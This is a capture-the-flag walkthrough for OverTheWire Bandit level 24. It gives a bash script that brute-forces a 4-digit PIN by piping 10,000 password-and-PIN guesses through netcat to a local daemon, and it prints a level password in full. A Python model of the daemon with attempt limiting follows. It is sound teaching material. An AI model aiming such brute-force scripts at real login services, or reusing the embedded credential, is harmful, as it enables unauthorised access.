OverTheWire Bandit: Level 24 → Level 25

Technical Note

Context

A daemon is listening on port 30002. It requires two things:

  1. The password for Bandit 24.
  2. A secret 4-digit PIN code.

There is no way to find the PIN other than trying every number from 0000 to 9999. This is called a Brute-Force attack.

Hint: “You do not need to create new connections each time.” This means we can send all attempts through a single connection stream.

Solution

Step 1: Strategy

Typing 10,000 PINs by hand is impractical, so we will write a script. Our script will:

  1. Loop from 0000 to 9999.
  2. Print one line in the format [Password] [PIN] for each number.
  3. Pipe (|) this output into nc (netcat).

Step 2: Prepare the Script

Let’s move to a workspace:

mkdir -p /tmp/bruteforce
cd /tmp/bruteforce
nano breaker.sh

Script Content:

#!/bin/bash

# Bandit 24 Password
PASS="iCeGdTE7FqfRMCw5lhC05b2x0qX3hZU"

# {0000..9999} expands to all numbers with leading zeros
for i in {0000..9999}
do
    echo "$PASS $i"
done

Save and exit (Ctrl+O, Enter, Ctrl+X).

You must make the script executable before running it:

chmod +x breaker.sh

Step 3: Launch the Attack

Now, let’s pipe the output of our script directly into the network connection. We will receive thousands of “Wrong! Please enter the correct pincode” messages. To find the needle in the haystack, we use grep.

grep -v "Wrong" hides any line containing “Wrong”, showing us only the success message.

./breaker.sh | nc localhost 30002 | grep -v "Wrong"

It will blast through the combinations and, when it hits the correct PIN, print the daemon's Correct! reply together with the password for Bandit 25.

Step 4: Save the Password

You will see Correct! and the new password. Save it.

Key Takeaways

  1. Brute-Force: A method of breaking a password by trying all possible combinations.
  2. Bash Range Expansion: using {0000..9999} to generate sequences.
  3. Pipelining: Creating a stream of data (thousands of guesses) and feeding it into another program (nc). This is much faster than opening 10,000 separate connections.
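The reason the single-connection trick works is that the daemon answers every line on the stream and never hangs up. The Python below is an added example, not part of the walkthrough and not OverTheWire's own daemon code: it models the check from the defender's side, with the same line format and reply strings the level uses, and puts the unlimited design next to a session that closes after a fixed number of wrong guesses. The password, the PIN and the MAX_ATTEMPTS value are constructed placeholders.

```python
"""Model of a PIN-check daemon, unlimited vs. attempt-limited sessions.

Added example, not the real Bandit daemon. Protocol as described in the
level: each line is "<password> <4-digit PIN>"; a wrong line is answered
with "Wrong! Please enter the correct pincode", the right one with
"Correct!". The password, PIN and attempt limit below are constructed.
"""

import secrets

EXPECTED_PASSWORD = "placeholder-bandit24-password"  # constructed, not the real one
SECRET_PIN = "4271"                                   # constructed
MAX_ATTEMPTS = 5                                      # assumed policy value

WRONG = "Wrong! Please enter the correct pincode"
CORRECT = "Correct!"
LOCKED = "Too many attempts; closing connection"


def check_guess(line: str) -> str:
    """Validate one protocol line the way the daemon does, one line at a time."""
    if not line.isascii():
        return WRONG
    parts = line.strip().split(" ")
    if len(parts) != 2:
        return WRONG
    password, pin = parts
    # Constant-time comparisons so the check itself leaks nothing via timing.
    ok_pass = secrets.compare_digest(password, EXPECTED_PASSWORD)
    ok_pin = len(pin) == 4 and pin.isdigit() and secrets.compare_digest(pin, SECRET_PIN)
    return CORRECT if (ok_pass and ok_pin) else WRONG


def serve_unlimited(lines):
    """The weak design: answer every line on the connection and never hang up."""
    return [check_guess(line) for line in lines]


def serve_limited(lines, max_attempts: int = MAX_ATTEMPTS):
    """Hardened session: stop reading after max_attempts wrong lines."""
    replies = []
    failures = 0
    for line in lines:
        reply = check_guess(line)
        replies.append(reply)
        if reply == CORRECT:
            break
        failures += 1
        if failures >= max_attempts:
            replies.append(LOCKED)
            break
    return replies


def brute_force_stream(password: str):
    """Constructed guess stream shaped like the walkthrough's script output."""
    return (f"{password} {i:04d}" for i in range(10000))


if __name__ == "__main__":
    unlimited = serve_unlimited(brute_force_stream(EXPECTED_PASSWORD))
    print("unlimited: answered", len(unlimited), "lines; Correct! at index",
          unlimited.index(CORRECT))
    limited = serve_limited(brute_force_stream(EXPECTED_PASSWORD))
    print("limited: answered", len(limited) - 1, "lines, then:", limited[-1])
```

Against the unlimited server the full 10,000-line stream is processed on one connection and the correct reply appears at the PIN's position; the limited server answers five wrong lines and then closes, so the same stream would need thousands of fresh connections, which is exactly the cost the level's hint removes for the attacker and a rate limit reinstates.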